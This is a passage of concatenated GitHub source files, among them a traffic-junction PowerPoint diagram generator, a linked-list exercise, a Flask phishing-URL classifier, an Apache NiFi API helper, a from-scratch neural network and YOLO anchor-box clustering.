\"EAST_MOR_R\": self.EA.MOR.R, \"EAST_MOR_T\": self.EA.MOR.T, \"EAST_MOR_L\": self.EA.MOR.L,\n \"WEST_MOR_R\": self.WE.MOR.R, \"WEST_MOR_T\": self.WE.MOR.T, \"WEST_MOR_L\": self.WE.MOR.L\n }\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in volume_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.language_id = MSO_LANGUAGE_ID.HEBREW\n font.bold = True\n font.italic = None\n font.size = Pt(16)\n font.color.rgb = RGBColor(255, 192, 0)\n font.name = \"Assistant\"\n if volume_placeholders[shape.name] == 0:\n data_to_push = \"-\"\n else:\n data_to_push = str(volume_placeholders[shape.name])\n run.text = data_to_push\n pres.save(\"Morn_Diagram.pptx\")\n\n def add_evening_volumes(self, pres):\n \"\"\"\n The method goes through all the shapes in Diagram pptx file and checks if it represents a volume of the\n evening counts; It adds the matching volume to each direction, based on the route property of each direction(\n L,T,R).\n \"\"\"\n volume_placeholders = {\"NORTH_EVE_R\": self.NO.EVE.R, \"NORTH_EVE_T\": self.NO.EVE.T, \"NORTH_EVE_L\": self.NO.EVE.L,\n \"SOUTH_EVE_R\": self.SO.EVE.R, \"SOUTH_EVE_T\": self.SO.EVE.T, \"SOUTH_EVE_L\": self.SO.EVE.L,\n \"EAST_EVE_R\": self.EA.EVE.R, \"EAST_EVE_T\": self.EA.EVE.T, \"EAST_EVE_L\": self.EA.EVE.L,\n \"WEST_EVE_R\": self.WE.EVE.R, \"WEST_EVE_T\": self.WE.EVE.T, \"WEST_EVE_L\": self.WE.EVE.L}\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in volume_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = True\n font.italic = None\n font.size = Pt(16)\n font.color.rgb = RGBColor(200, 214, 223)\n font.name = \"Assistant\"\n if volume_placeholders[shape.name] == 0:\n data_to_push = \"-\"\n else:\n data_to_push = str(volume_placeholders[shape.name])\n run.text = data_to_push\n pres.save(\"Eve_Diagram.pptx\")\n\n def add_direction_arrows(self, pres):\n \"\"\"\n The method goes through all the shapes in Diagram pptx file and checks if it represents a string of arrows;\n It adds the matching arrow string after organizing them in the right logical order,\n using Organize_arrows_order method.\n \"\"\"\n match_colors_to_type = {\"White\": RGBColor(255, 255, 255), \"Yellow\": RGBColor(250, 201, 49)}\n arrows_placeholders = {\"NORTH_ARROWS\": self.NO.LAN.Organize_arrows_order(),\n \"SOUTH_ARROWS\": self.SO.LAN.Organize_arrows_order(),\n \"EAST_ARROWS\": self.EA.LAN.Organize_arrows_order(),\n \"WEST_ARROWS\": self.WE.LAN.Organize_arrows_order()}\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in arrows_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n arrows_list = arrows_placeholders[shape.name]\n for arrow in arrows_list:\n text_frame = shape.text_frame\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = False\n font.size = Pt(50)\n font.color.rgb = match_colors_to_type[arrow[2]]\n font.name = 'Traffic Arrows 2 Medium normal'\n run.text = arrow[0] * arrow[1]\n pres.save(\"Dirc_Diagram.pptx\")\n\n def is_oneway(self, pres):\n \"\"\"the method is being called when the junction has three directions; It checks if the fourth direction is a\n oneway direction. If it is, it adds a matching oneway road to the final diagram. \"\"\"\n opt_oneway = self.G_INF.ONEWAY\n src = os.getcwd() + r\"\\Oneway_template\\\\\"\n type_dict = {2: \"NoWest\", 3: \"NoNorth\", 4: \"NoEast\", 5: \"NoSouth\"}\n OneWay = \"\"\n if type_dict[opt_oneway] == \"NoNorth\":\n if (self.EA.MOR.R > 0) or (self.EA.EVE.R > 0) \\\n or (self.WE.MOR.L > 0) or (self.WE.EVE.L > 0) \\\n or (self.SO.MOR.T > 0) or (self.SO.EVE.T > 0):\n OneWay = \"North\"\n\n if type_dict[opt_oneway] == \"NoSouth\":\n if (self.WE.MOR.R > 0) or (self.WE.EVE.R > 0) \\\n or (self.EA.MOR.L > 0) or (self.EA.EVE.L > 0) \\\n or (self.NO.MOR.T > 0) or (self.NO.EVE.T > 0):\n OneWay = \"South\"\n\n if type_dict[opt_oneway] == \"NoEast\":\n if (self.SO.MOR.R > 0) or (self.SO.EVE.R > 0) \\\n or (self.NO.MOR.L > 0) or (self.NO.EVE.L > 0) \\\n or (self.WE.MOR.T > 0) or (self.WE.EVE.T > 0):\n OneWay = \"East\"\n\n if type_dict[opt_oneway] == \"NoWest\":\n if (self.NO.MOR.R > 0) or (self.NO.EVE.R > 0) \\\n or (self.SO.MOR.L > 0) or (self.SO.EVE.L > 0) \\\n or (self.EA.MOR.T > 0) or (self.EA.EVE.T > 0):\n OneWay = \"West\"\n if OneWay != \"\":\n for slide in pres.slides:\n oneway_prop = {\"North\": [2915380, 0], # North: [(slide.width - pic.width)/2, 0]\n \"South\": [2915380, 4635945],\n # South: [(slide.width - pic.width)/2, (slide.height - pic.height)]\n \"East\": [4635945, 2915380],\n # East: [(slide.width - pic.width), (slide.width - pic.width)/2]\n \"West\": [0, 2915380]} # West: [0, (slide.width - pic.width)/2]\n\n img_path = src + OneWay + \"_one_way.png\"\n slide.shapes.add_picture(img_path, oneway_prop[OneWay][0], oneway_prop[OneWay][1])\n","repo_name":"dartaryan/JUNC","sub_path":"Diagram.py","file_name":"Diagram.py","file_ext":"py","file_size_in_byte":19588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30944765296","text":"class Node:\n def __init__(self, val=None):\n self.val = val\n self.next, self.prev = None\n\n\nclass MyLinkedList:\n\n def __init__(self):\n self.head = Node()\n\n def get(self, index: int) -> int:\n current = self.head\n ptr = 0\n while ptr < index:\n current = current.next\n ptr += 1\n if current is None:\n return -1\n if current.next is None:\n return -1\n return current.next.val\n\n def addAtHead(self, val: int) -> None:\n values = Node(val)\n values.next = self.head.next\n self.head.next = values\n return self.head.next.val\n\n def addAtTail(self, val: int) -> None:\n if self.head.next == None:\n self.head.next = Node(val)\n return\n current = self.head\n while current.next is not None:\n current = current.next\n current.next = Node(val)\n\n def addAtIndex(self, index: int, val: int) -> None:\n current = self.head\n for ptr in range(index):\n current = current.next\n inserted_value = Node(val)\n if current is None:\n current = inserted_value\n inserted_value.next = current.next\n current.next = inserted_value\n\n def deleteAtIndex(self, index: int) -> None:\n current = self.head\n for ptr in range(index):\n current = current.next\n if current is None:\n return\n \n if current.next is None:\n return\n elif current.next.next is None:\n current.next = None\n else:\n current.next = current.next.next\n","repo_name":"primequantuM4/competitive_programming","sub_path":"DesignLinkedList.py","file_name":"DesignLinkedList.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25586220733","text":"from extract_features import get_features\r\nfrom flask import Flask, render_template, request\r\nimport pickle\r\nimport numpy as np\r\n\r\napp = Flask(__name__)\r\n\r\ndef convertEncodingToPositive(data):\r\n mapping = {-1: 2, 0: 0, 1: 1}\r\n i = 0\r\n for col in data:\r\n data[i] = mapping[col]\r\n i+=1\r\n return data\r\n\r\ndef make_prediction(url):\r\n\r\n features = get_features(url)\r\n #print(features)\r\n features_extracted = convertEncodingToPositive(features)\r\n #print(features_extracted)\r\n\r\n from sklearn.preprocessing import OneHotEncoder\r\n encoder = OneHotEncoder(sparse=False)\r\n\r\n one_hot_enc = pickle.load(open(\"One_Hot_Encoder\", \"rb\"))\r\n transformed_point = one_hot_enc.transform(np.array(features_extracted).reshape(1, -1))\r\n\r\n model = pickle.load(open(\"RF_Final_Model.pkl\", \"rb\"))\r\n prediction = model.predict(transformed_point)[0]\r\n\r\n return prediction\r\n\r\n\r\n\r\n\r\n@app.route('/')\r\ndef first():\r\n return render_template('home.html')\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef home():\r\n \r\n url = request.form['url']\r\n \r\n output = make_prediction(url)\r\n\r\n return render_template('home.html', prediction_text=output)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\" :\r\n\r\n #Updates app dynamically\r\n app.run(debug=True)\r\n\r\n\r\n\r\n\r\n# url = \"https://www.github.com/karans-15\"\r\n\r\n# def make_prediction(url):\r\n\r\n# features = get_features(url)\r\n# #print(features)\r\n# features_extracted = convertEncodingToPositive(features)\r\n# #print(features_extracted)\r\n\r\n# from sklearn.preprocessing import OneHotEncoder\r\n# encoder = OneHotEncoder(sparse=False)\r\n\r\n# one_hot_enc = pickle.load(open(\"One_Hot_Encoder\", \"rb\"))\r\n# transformed_point = one_hot_enc.transform(np.array(features_extracted).reshape(1, -1))\r\n\r\n# model = pickle.load(open(\"RF_Final_Model.pkl\", \"rb\"))\r\n# prediction = model.predict(transformed_point)[0]\r\n\r\n# if(prediction==1):\r\n# print(\"Website is SAFE!\")\r\n# elif(prediction==2):\r\n# print(\"DANGER!! This appears to be a phishing website\")\r\n# else:\r\n# print(\"Proceed with CAUTION, this seems Suspicious\")\r\n\r\n# make_prediction(url)","repo_name":"karans-15/malicious-url-detector","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74367406170","text":"__version__ = \"1.0.0\"\n\n\nclass MovieMaker(object):\n \"\"\"\n MovieMaker class\n Save frames into files in order to make of movie\n \"\"\"\n\n allowed_type = {'tif', 'gif', 'png'}\n\n def __init__(self, ptw, name, movie_type):\n \"\"\"\n Class constructorlandLineWidth\n :param ptw:\n :param name:\n :param movie_type:\n :return:\n \"\"\"\n self.ptw = ptw\n self.name = name\n self.frame = 0\n if movie_type in self.allowed_type:\n self.type = movie_type\n else:\n raise \"{} is not a supported type. You should use {} instead\".format(type, self.allowed_type)\n self.prepare()\n\n def prepare(self):\n \"\"\"\n Create destination folder\n :return:\n \"\"\"\n import os\n if not os.path.isdir(self.name):\n os.mkdir(self.name)\n\n def run(self):\n \"\"\"\n Captures a frame into a numbered file\n :return:\n \"\"\"\n # Make Movie\n self.frame += 1\n filename = \"{}/{}_{}.{}\".format(self.name, self.name, self.frame, self.type)\n self.ptw.getMovieFrame()\n #self.ptw.saveMovieFrames(filename)\n\n def close(self):\n \"\"\"\n Saves the captured frame into a file\n :return:\n \"\"\"\n filename = \"{}/{}_{}.{}\".format(self.name, self.name, self.frame, self.type)\n self.ptw.saveMovieFrames(filename)","repo_name":"Fperdreau/EasyExp","sub_path":"core/movie/moviemaker.py","file_name":"moviemaker.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4964479168","text":"import requests\nimport json\nfrom time import time\n\n\ndef pause(secs):\n init_time = time()\n while time() < init_time + secs:\n pass\n\ndef get_token(url_nifi_api: str, access_payload: dict):\n \"\"\"\n Retrieves a JWT token by authenticating the user, makes\n use of the REST API `/access/token`.\n :param url_nifi_api: the basic URL to the NiFi API.\n :param access_payload: dictionary with keys 'username' & 'password' and\n fitting values.\n :return: JWT Token\n \"\"\"\n\n header = {\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"*/*\",\n }\n response = requests.post(\n url_nifi_api + \"access/token\", headers=header, data=access_payload, verify=False\n )\n return response.content.decode(\"ascii\")\n\ndef get_processor(url_nifi_api: str, processor_id: str, token=None):\n \"\"\"\n Gets and returns a single processor.\n Makes use of the REST API `/processors/{processor_id}`.\n :param url_nifi_api: String\n :param processor_id: String\n :param token: JWT access token\n :returns: JSON object processor\n \"\"\"\n\n # Authorization header\n header = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {}\".format(token),\n }\n\n # GET processor and parse to JSON\n response = requests.get(url_nifi_api + f\"processors/{processor_id}\", headers=header, verify=False)\n return json.loads(response.content)\n\ndef update_processor_status(processor_id: str, new_state: str, token, url_nifi_api):\n \"\"\"Starts or stops a processor by retrieving the processor to get\n the current revision and finally putting a JSON with the desired\n state towards the API.\n :param processor_id: Id of the processor to receive the new state.\n :param new_state: String representing the new state, acceptable\n values are: STOPPED or RUNNING.\n :param token: a JWT access token for NiFi.\n :param url_nifi_api: URL to the NiFi API\n :return: None\n \"\"\"\n\n # Retrieve processor from `/processors/{processor_id}`\n processor = get_processor(url_nifi_api, processor_id, token)\n\n # Create a JSON with the new state and the processor's revision\n put_dict = {\n \"revision\": processor[\"revision\"],\n \"state\": new_state,\n \"disconnectedNodeAcknowledged\": True,\n }\n\n # Dump JSON and POST processor\n payload = json.dumps(put_dict).encode(\"utf8\")\n\n header = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {}\".format(token),\n }\n\n response = requests.put(\n url_nifi_api + f\"processors/{processor_id}/run-status\",\n headers=header,\n data=payload,\n verify=False\n )\n #urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n return response\n ","repo_name":"TianaDoto/ece_pipeline_2022","sub_path":"Projet_exam/airflow/dags/nifi_airflow_connector.py","file_name":"nifi_airflow_connector.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37374769228","text":"\r\nimport numpy as np\r\nfrom time import time\r\nimport random\r\nimport pickle\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nimport ttkbootstrap as ttk\r\n\r\n\r\nclass Reseau():\r\n def __init__(self,taille:[int],act_function='sigmoid',input_parameters=None,stored_dataset=[],symbols={}):\r\n self.taille = taille\r\n self.act_function = act_function\r\n self.stored_dataset = stored_dataset\r\n self.symbols = symbols # dictionnaire associant à chaque symbole (écrit en string) son nombre de représentations dans data_set\r\n self.weights = [[]] + [np.random.uniform(-3,3,(self.taille[i],self.taille[i-1])) for i in range(1,len(self.taille))]\r\n self.biases = [[]] + [np.random.uniform(-2,2,(self.taille[i],1)) for i in range(1,len(self.taille))]\r\n if not input_parameters is None :\r\n self.weights = input_parameters[0]\r\n self.biases = input_parameters[1]\r\n\r\n self.manual_stop = False\r\n self.accuracy = -1\r\n self.average_cost = -1\r\n self.total_generations = 0\r\n self.total_duration = 0\r\n\r\n\r\n def activation_function(self,t):\r\n if self.act_function == 'sigmoid' :\r\n return 1 / (1+np.exp(-t))\r\n\r\n def der_activation_function(self,t):\r\n if self.act_function == 'sigmoid' :\r\n return np.exp(-t) / (1+np.exp(-t))**2\r\n\r\n def normalized(self,DATA):\r\n # if isinstance(DATA[-1][0], list) or len(DATA[-1][0].shape) != 2 :\r\n if isinstance(DATA[-1][0],np.ndarray) and len(DATA[-1][0].shape) == 2 : return DATA\r\n for i in range(len(DATA)) :\r\n DATA[i][0] = np.reshape(DATA[i][0],(-1,1)).astype(float)\r\n DATA[i][1] = np.reshape(DATA[i][1],(-1,1)).astype(float)\r\n\r\n return DATA\r\n\r\n def shuffled_data(self,DATA,data_shrink,data_number):\r\n nb_elements = min(data_number, data_shrink*len(DATA),)\r\n return random.sample(DATA,nb_elements)\r\n\r\n def string_duration(self,seconds):\r\n seconds = int(seconds)\r\n if seconds < 60:\r\n return f\"{seconds}s\"\r\n minutes, seconds = seconds // 60, seconds % 60\r\n if minutes < 60:\r\n return f\"{minutes}min {seconds}s\"\r\n hours, minutes = minutes // 60, minutes % 60\r\n return f\"{hours}h {minutes}min\"\r\n\r\n def set_stop(self):\r\n self.manual_stop = True\r\n\r\n def reset_everything(self):\r\n self.__init__(taille=self.taille,stored_dataset=self.stored_dataset,symbols=self.symbols)\r\n\r\n def evaluate_accuracy(self,data=None,do_print=False):\r\n if data is None :\r\n if len(self.stored_dataset) == 0 : raise Exception(\"pas de stored_dataset, impossible de calculer l'accuracy\")\r\n data = self.stored_dataset\r\n data = self.normalized(data)\r\n correct_results = 0\r\n\r\n for entree, sortie_attendue in data:\r\n sortie = self.feedforward(entree)\r\n smoothed_sortie = [0 if x<0.5 else 1 for x in sortie]\r\n smoothed_sortie_attendue = [0 if x<0.5 else 1 for x in sortie_attendue]\r\n if smoothed_sortie == smoothed_sortie_attendue :\r\n correct_results += 1\r\n\r\n self.accuracy = correct_results / len(data)\r\n if do_print==True : print(self.accuracy)\r\n\r\n\r\n def evaluate_cost(self,data=None,do_print=False): # renvoie la moyenne des coûts C0 pour chaque exemple (i.e. somme des carrés des écarts de chaque neuronne de la dernière couche)\r\n if data is None :\r\n if self.stored_dataset == [] : raise Exception('pas de stored_dataset, impossible de calculer la précision')\r\n data = self.stored_dataset\r\n data = self.normalized(data)\r\n\r\n total_cost = 0.0\r\n for entree,sortie_attendue in data :\r\n sortie = self.feedforward(entree)\r\n for a_calc,a_att in zip(sortie[1],sortie_attendue[1]) :\r\n total_cost += (a_calc - a_att)**2\r\n\r\n average_cost = total_cost / len(data) / self.taille[-1] # coût moyen par neuronne final par exemple\r\n self.average_cost = average_cost\r\n\r\n if do_print == True :\r\n print(f\"le côut moyen par neuronne final par exemple est de {self.average_cost}\")\r\n\r\n\r\n def feedforward(self,A_K:[float],J=1): # entrée A_K : vecteur colonne des activations de la couche K, précédent la couche suivante J, on va jusqu'à la dernière couche récursivement\r\n # if isinstance(A_K,list) or len(A_K.shape) !=2 : raise ValueError('PAS un vecteur colonne en entrée de feedforward')\r\n A_K = np.reshape(A_K,(-1,1))\r\n if J == len(self.taille) :\r\n return A_K\r\n else :\r\n W_J = self.weights[J]\r\n B_J = self.biases[J]\r\n Z_J = np.dot(W_J, A_K) + B_J\r\n A_J = self.activation_function(Z_J)\r\n\r\n return self.feedforward(A_J,J+1)\r\n\r\n def all_activations(self,entree):\r\n entree = np.reshape(entree,(-1,1))\r\n A_K, J, all_A,all_Z = entree, 1, [entree], [[]]\r\n while J < len(self.taille) :\r\n W_J = self.weights[J]\r\n B_J = self.biases[J]\r\n Z_J = np.dot(W_J,A_K) + B_J\r\n A_K = self.activation_function(Z_J)\r\n\r\n all_A.append(A_K)\r\n all_Z.append(Z_J)\r\n J += 1\r\n return [all_A,all_Z]\r\n\r\n\r\n def gradient_local(self,entree,sortie_attendue): # entree et sortie_attendue doivent être des vecteurs colonnes\r\n entree = np.reshape(entree,(-1,1))\r\n sortie_attendue = np.reshape(sortie_attendue,(-1,1))\r\n\r\n\r\n partial_derivatives_weights = [np.zeros_like(self.weights[K]) for K in range(len(self.taille))]\r\n partial_derivatives_biases = [np.zeros_like(self.biases[K]) for K in range(len(self.taille))]\r\n\r\n all_A, all_Z = self.all_activations(entree)\r\n sortie = all_A[-1]\r\n\r\n par_der_A_S = par_der_A_K = np.array([ 2 * 1 * (sortie[k,0] - sortie_attendue[k,0]) for k in range(len(sortie)) ]).reshape(-1,1)\r\n J = len(self.taille)-1\r\n while J > 0 :\r\n K = J-1\r\n par_der_A_J = par_der_A_K\r\n\r\n # Activations : d a_k0 = sum(i=1 à l(J) de drond_cout a_j * σ'(z_j) * w_jk0 )\r\n par_der_A_K = np.zeros_like(all_A[K])\r\n for j in range(len(par_der_A_J)) :\r\n par_der_A_K += par_der_A_J[j] * self.der_activation_function(all_Z[J][j]) * self.weights[J][j,np.newaxis].T\r\n\r\n # Biais : d b_j0 = drond_cout a[_j0 * σ'(z_j0) * 1\r\n partial_derivatives_biases[J] += par_der_A_J * self.der_activation_function(all_Z[J]) * 1\r\n\r\n # Poids : d w_j0k0 = drond_cout a_j0 * σ'(z_j0) * a_k0\r\n partial_derivatives_weights[J] += all_A[K].T # On place d'abord a_k dans chaque colonne k\r\n partial_derivatives_weights[J] *= par_der_A_J * self.der_activation_function(all_Z[J]) # on multiplie ensuite chaque ligne j par drond a_j * σ'(z_j)\r\n\r\n # Récursivement, on calcule maintenant les dérivées partielles des poids associés à la couche précédente (en s'appuyant sur les dérivées partielles des activations de cette couche)\r\n J -= 1\r\n\r\n\r\n return [partial_derivatives_weights,partial_derivatives_biases]\r\n\r\n\r\n\r\n def apprendre(self,DATA:[ [[float],[float]] ]=None,pas=10.0, affichage_graphique=True, data_shrink=1.0,data_number=None,precision=1.01,duration=999999999,nb_generations=999999999,CHECK_PROPORTION=0.1):\r\n if DATA is None : DATA = self.stored_dataset\r\n if data_number is None : data_number = len(DATA)\r\n gen_count,start_time,elapsed_time, DATA,nb_seconds = 0,time(), 0, self.normalized(DATA),0\r\n if duration == 999999999 and nb_generations == 999999999 : raise Exception(\"pas de fin d'apprentissage !\")\r\n\r\n # Gère la partie affichage\r\n if affichage_graphique == True :\r\n window = ttk.Window()\r\n\r\n gen_count_tk = tk.StringVar(value='0 générations')\r\n av_cost_tk = tk.StringVar(value=f'coût moyen : {self.average_cost}')\r\n duree_tk = tk.StringVar(value=self.string_duration(0))\r\n\r\n\r\n global_frame = ttk.Frame(master=window)\r\n global_frame.pack()\r\n\r\n stop_button = ttk.Button(master=global_frame,text='stop',command= self.set_stop)\r\n stop_button.pack()\r\n\r\n gens_text = ttk.Label(master=global_frame,textvariable=gen_count_tk)\r\n gens_text.pack()\r\n\r\n duree_text = ttk.Label(master=global_frame,textvariable=duree_tk)\r\n duree_text.pack()\r\n\r\n av_cost_text = ttk.Label(master=global_frame,textvariable=av_cost_tk)\r\n av_cost_text.pack()\r\n\r\n\r\n\r\n\r\n window.update()\r\n\r\n def criteria_reached():\r\n nonlocal gen_count, elapsed_time,nb_seconds\r\n # if np.random.random() <= CHECK_PROPORTION :\r\n # self.evaluate_accuracy(DATA)\r\n gen_count += 1\r\n elapsed_time = time() - start_time\r\n if int(elapsed_time) > nb_seconds : # mises à jour 1fois par seconde\r\n nb_seconds = int(elapsed_time)\r\n print(f'{nb_seconds}s passées')\r\n self.evaluate_accuracy(DATA)\r\n self.evaluate_cost(DATA)\r\n if affichage_graphique :\r\n # gen_count_tk.set(f'{gen_count} générations')\r\n av_cost_tk.set(f'coût moyen : {self.average_cost}')\r\n duree_tk.set(self.string_duration(elapsed_time))\r\n pass\r\n\r\n if affichage_graphique :\r\n gen_count_tk.set(f'{gen_count} générations')\r\n window.update()\r\n\r\n return gen_count >= nb_generations or elapsed_time >= duration or self.manual_stop\r\n\r\n while not criteria_reached() :\r\n\r\n data = self.shuffled_data(DATA,data_shrink,data_number)\r\n\r\n G_global_W = [np.zeros_like(self.weights[K]) for K in range(len(self.taille))]\r\n G_global_B = [np.zeros_like(self.biases[K]) for K in range(len(self.taille))]\r\n for entree, sortie_attendue in data :\r\n G_local_W, G_local_B = self.gradient_local(entree,sortie_attendue)\r\n G_global_W = [arr_glob + arr_loc for arr_glob,arr_loc in zip(G_global_W,G_local_W)]\r\n G_global_B = [arr_glob + arr_loc for arr_glob,arr_loc in zip(G_global_B,G_local_B)]\r\n\r\n # print(f\"gen{gen_count} : gradient_weights=\\n {G_global_W[1]}\")\r\n # print(f\"gen{gen_count} : gradient_biases=\\n {G_global_B[1]}\")\r\n\r\n self.weights = [arrW + pas * (-g_global_W) / len(data) for arrW,g_global_W in zip(self.weights,G_global_W)]\r\n self.biases = [arrB + pas * (-g_global_B) / len(data) for arrB, g_global_B in zip(self.biases,G_global_B)]\r\n\r\n\r\n\r\n print('finished working !')\r\n # self.evaluate_accuracy(DATA)\r\n self.manual_stop = False\r\n self.total_generations += gen_count\r\n self.total_duration += nb_seconds\r\n print(f'\\nnb générations faites : {gen_count} ({self.total_generations}) | durée : {self.string_duration(elapsed_time)}')\r\n\r\n if affichage_graphique :\r\n window.mainloop()\r\n\r\n\r\n\r\n","repo_name":"GoldEEr17/TIPE_Dobble","sub_path":"reseau_general.py","file_name":"reseau_general.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24800361541","text":"from apps.activity import jinja_tags\nfrom canvas.notifications.base_channel import CommunicationsChannel\nfrom drawquest.apps.push_notifications import models\n\n\nclass PushNotificationChannel(CommunicationsChannel):\n recipient_actions = [\n 'quest_of_the_day',\n 'new_palettes',\n 'facebook_friend_joined',\n 'starred',\n ]\n\n @classmethod\n def enabled_for_recipient_action(cls, action, recipient, pending_notification=None, *args, **kwargs):\n flag = super(PushNotificationChannel, cls).enabled_for_recipient_action(\n action, recipient, pending_notification=pending_notification, *args, **kwargs)\n\n try:\n return flag and not models.is_unsubscribed(recipient, action)\n except ValueError:\n return flag\n\n def _push(self, notification, alert, extra_metadata={}, badge=None):\n recipient = notification.recipient\n models.push_notification(notification.action, alert,\n recipient=recipient, extra_metadata=extra_metadata, badge=badge)\n\n def _action_facebook_friend_joined(self, notification):\n self._push(notification, \"{} {} has joined DrawQuest!\".format(notification.actor.facebookuser.first_name,\n notification.actor.facebookuser.last_name),\n extra_metadata={'username': notification.actor.username})\n\n def _action_starred(self, notification):\n self._push(notification, \"{} has starred your drawing!\".format(notification.actor.username),\n extra_metadata={\n 'comment_id': notification.comment_sticker.comment.id,\n 'quest_id': notification.comment_sticker.comment.parent_comment_id,\n })\n\n def deliver(self, notification):\n getattr(self, '_action_' + notification.action)(notification)\n\n","repo_name":"canvasnetworks/canvas","sub_path":"website/drawquest/apps/push_notifications/push_notification_channel.py","file_name":"push_notification_channel.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"13582063550","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 17 17:43:39 2019\n\n@author: deniz\n\"\"\"\n\nimport json\nimport os\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns; sns.set() # for plot styling\n\nos.chdir(\"/media/deniz/02B89600B895F301/BBD100K\")\ntrain_path = \"data/labels/train/bdd100k_labels_images_train.json\"\n\nwith open(train_path,\"r\") as ftr:\n trlabel = json.load(ftr)\n \nBBDlabeldict = {\"bike\":0,\n \"bus\":1,\n \"car\":2,\n \"motor\":3,\n \"person\":4,\n \"rider\":5,\n \"traffic light\":6,\n \"traffic sign\":7,\n \"train\":8,\n \"truck\":9,\n \"drivable area\":[],\n \"lane\":[]}\n\nw,h = [] , []\nfor ind1 in range(len(trlabel)):\n for ind2 in range(len(trlabel[ind1][\"labels\"])):\n try:\n a=trlabel[ind1][\"labels\"][ind2][\"box2d\"] #traffic sign\n x1,y1,x2,y2 = list(a.values())\n width = abs(x1-x2)\n height = abs(y1-y2)\n w.append(width)\n h.append(height)\n except:\n pass\nw=np.asarray(w)\nh=np.asarray(h)\n \nx=[w,h]\nx=np.asarray(x)\nx=x.transpose()\n########################################## K- Means\n##########################################\n\nfrom sklearn.cluster import KMeans\nkmeans3 = KMeans(n_clusters=9)\nkmeans3.fit(x)\ny_kmeans3 = kmeans3.predict(x)\n\n##########################################\ncenters3 = kmeans3.cluster_centers_\n\nyolo_anchor_average=[]\nfor ind in range (9):\n yolo_anchor_average.append(np.mean(x[y_kmeans3==ind],axis=0))\n\nyolo_anchor_average=np.array(yolo_anchor_average)\n\nplt.scatter(x[:, 0], x[:, 1], c=y_kmeans3, s=2, cmap='viridis')\nplt.scatter(yolo_anchor_average[:, 0], yolo_anchor_average[:, 1], c='red', s=50);\nyoloV3anchors = yolo_anchor_average\nyoloV3anchors[:, 0] =yolo_anchor_average[:, 0] /1280 *608\nyoloV3anchors[:, 1] =yolo_anchor_average[:, 1] /720 *608\nyoloV3anchors = np.rint(yoloV3anchors)\nfig, ax = plt.subplots()\nfor ind in range(9):\n rectangle= plt.Rectangle((304-yoloV3anchors[ind,0]/2,304-yoloV3anchors[ind,1]/2), yoloV3anchors[ind,0],yoloV3anchors[ind,1] , fc='b',edgecolor='b',fill = None)\n ax.add_patch(rectangle)\nax.set_aspect(1.0)\nplt.axis([0,608,0,608])\nplt.show()\nyoloV3anchors.sort(axis=0)\nprint(\"Your custom anchor boxes are {}\".format(yoloV3anchors))\n\nF = open(\"YOLOV3_BDD_Anchors.txt\", \"w\")\nF.write(\"{}\".format(yoloV3anchors))\nF.close() \n \n\n","repo_name":"decanbay/YOLOv3-Calculate-Anchor-Boxes","sub_path":"YOLOv3_get_anchors.py","file_name":"YOLOv3_get_anchors.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"17903868743","text":"from pickle import TRUE\nimport os\nimport torch\n\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nBATCH_SIZE = 64\nIMAGE_SIZE = 256\nNUM_WORKERS = 4\nPIN_MEMORY = TRUE\nDATASET_PATH = \"./crowdai/\"\nSAVED_PATH = \"./saved/Models\"\nVAL_SIZE = 0.2\nMODEL = \"ResNet18\"\nN_CLASSES = len(os.listdir(DATASET_PATH))","repo_name":"shashi7679/Plant-Disease-Detector","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16621505396","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression, ElasticNet, Lasso\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\n# import data form csv files\ngeneration_per_type = pd.read_csv('SEF-ML/data/actual_aggregated_generation_per_type.csv')\napx_price = pd.read_csv('SEF-ML/data/apx_day_ahead.csv')\ngeneration_day_ahead = pd.read_csv('SEF-ML/data/day_ahead_aggregated_generation.csv')\nderived_system_wide_data = 